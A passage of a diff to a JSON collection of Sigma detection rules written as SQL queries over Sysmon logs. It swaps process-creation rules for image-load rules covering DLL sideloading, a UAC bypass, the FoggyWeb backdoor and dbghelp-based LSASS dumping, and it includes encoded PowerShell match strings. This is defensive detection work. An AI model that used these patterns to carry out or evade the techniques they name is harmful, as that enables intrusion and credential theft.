Sungurov , oscd.community", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts", - "Legit usage of scripts" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\pcwrun.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pcwrun.yml" + "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "Suspicious Obfuscated PowerShell Code", - "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", - "status": "experimental", - "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", - "author": "Florian Roth (Nextron Systems)", + "title": "Active Directory Parsing DLL Loaded Via Office Application", + "id": "a2a3b925-7bb0-433b-b508-db9003263cc4", + "status": "test", + "description": "Detects DSParse DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine 
LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE '%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR CommandLine LIKE '%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 
'%\\\\dsparse.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_encoded_obfusc.yml" + "filename": "image_load_office_dsparse_dll_load.yml" }, { - "title": "Suspicious Download Via Certutil.EXE", - "id": "19b08b1c-861d-4e75-a1ef-ea0c1baf202b", - "status": "test", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files.", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential DLL Sideloading Via ClassicExplorer32.dll", + "id": "caa02837-f659-466f-bca6-48bde2826ab4", + "status": "experimental", + "description": "Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\ClassicExplorer32.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Classic Shell\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_certutil_download.yml" + "filename": "image_load_side_load_classicexplorer32.yml" }, { - "title": "Control Panel Items", - "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "title": "FoggyWeb Backdoor DLL Loading", + "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", "status": "test", - "description": "Detects the malicious use of a control panel item", - "author": "Kyaw Min 
Thein, Furkan Caliskan (@caliskanfurkan_)", + "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected \"version.dll\" dll", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.resource_development", + "attack.t1587" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\')" + ], + "filename": "image_load_malware_foggyweb_nobelium.yml" + }, + { + "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", + "id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", + "status": "experimental", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218.002", - "attack.persistence", - "attack.t1546" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE '%igfxCPL.cpl%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '\tC:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR 
(Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_control_panel_item.yml" + "filename": "image_load_dll_vssapi_susp_load.yml" }, { - "title": "Potential Download/Upload Activity Using Type Command", - "id": "aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f", + "title": "Potential Antivirus Software DLL Sideloading", + "id": "552b6b65-df37-4d3e-a258-f2fc4771ae54", "status": "experimental", - "description": "Detects usage of the \"type\" command to download/upload data from WebDAV server", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Applications that load the same dlls mentioned in the detection section. 
Investigate them and filter them out if a lot FPs are caused.", + "Dell SARemediation plugin folder (C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll) is known to contain the 'log.dll' file.", + "The Canon MyPrinter folder 'C:\\Program Files\\Canon\\MyPrinter\\' is known to contain the 'log.dll' file" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > \\\\\\\\\\*' ESCAPE '\\') OR (CommandLine LIKE '%type \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((((((ImageLoaded LIKE '%\\\\log.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Program Files\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\TelemetryUtility.exe' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\plugin\\\\log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\log.dll' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Canon\\\\MyPrinter\\\\%' ESCAPE '\\'))) OR (ImageLoaded LIKE '%\\\\qrt.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\')))) OR ((ImageLoaded LIKE '%\\\\ashldres.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockdown.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsodscpl.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\McAfee\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\McAfee\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\vftrace.dll' ESCAPE '\\' AND NOT ((ImageLoaded 
LIKE 'C:\\\\Program Files\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\wsc.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\tmdbglog.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\DLPPREM32.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\ESET%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\ESET%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_lolbin_type.yml" + "filename": "image_load_side_load_antivirus.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher", - "id": "b222df08-0e07-11eb-adc1-0242ac120002", + "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", + "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", "status": "test", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001" ], 
"falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" + "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" }, { - "title": "New Service Creation Using Sc.EXE", - "id": "85ff530b-261d-48c6-a441-facaa2e81e48", - "status": "test", - "description": "Detects the creation of a new service using the \"sc.exe\" utility.", - "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "title": "DLL Sideloading Of DBGCORE.DLL", + "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", + "status": "experimental", + "description": "Detects DLL sideloading of \"dbgcore.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ + "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate administrator or user creates a service for legitimate reasons.", - "Software installation" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\')" + "SELECT * FROM 
logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sc_create_service.yml" + "filename": "image_load_side_load_dbgcore_dll.yml" }, { - "title": "Windows Update Client LOLBIN", - "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", + "title": "Potential DLL Sideloading Via comctl32.dll", + "id": "6360757a-d460-456c-8b13-74cf0e60cceb", "status": "experimental", - "description": "Detects code execution via the Windows Update client (wuauclt)", - "author": "FPT.EagleEye Team", + "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", + "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1105", - "attack.t1218" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' 
ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_wuauclt_execution.yml" + "filename": "image_load_side_load_comctl32.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", - "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", - "status": "test", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "UAC Bypass Using Iscsicpl - ImageLoad", + "id": "9ed5959a-c43c-4c59-84e3-d28628429456", + "status": "experimental", + "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR 
CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml" + "filename": "image_load_uac_bypass_iscsicpl.yml" }, { - "title": "PUA - Nmap/Zenmap Execution", - "id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", + "title": "Time Travel Debugging Utility Usage - Image", + "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", "status": "test", - "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", - "author": "frack113", + "description": "Detects usage of Time Travel Debugging Utility. 
Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.defense_evasion", + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" ], "falsepositives": [ - "Network administrator computer" + "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nmap.exe' ESCAPE '\\' OR Image LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 'zennmap.exe')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nmap_zenmap.yml" + "filename": "image_load_tttracer_mod_load.yml" }, { - "title": "Suspicious RASdial Activity", - "id": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", - "status": "test", - "description": "Detects suspicious process related to rasdial.exe", - "author": "juju4", + "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", + "id": "75e508f7-932d-4ebc-af77-269237a84ce1", + "status": "experimental", + "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.t1218.003" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%rasdial.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE 
(EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rasdial_execution.yml" + "filename": "image_load_cmstp_load_dll_from_susp_location.yml" }, { - "title": "Add User to Local Administrators Group", - "id": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", - "status": "experimental", - "description": "Detects suspicious command line that adds an account to the local administrators/administrateurs group", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "GAC DLL Loaded Via Office Applications", + "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", + "status": "test", + "description": "Detects any GAC DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Administrative activity" + "Legitimate macro usage. 
Add the appropriate filter according to your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '% administrators %' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_add_user_local_admin_group.yml" + "filename": "image_load_office_dotnet_gac_dll_load.yml" }, { - "title": "Suspicious Msiexec Quiet Install", - "id": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", - "status": "experimental", - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", - "author": "frack113", + "title": "WMIC Loading Scripting Libraries", + "id": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", + "status": "test", + "description": "Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - 
"attack.t1218.007" + "attack.t1220" ], "falsepositives": [ - "Legitimate script" + "The command wmic os get lastboottuptime loads vbscript.dll", + "The command wmic os get locale loads vbscript.dll", + "Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/j%' ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (ParentImage 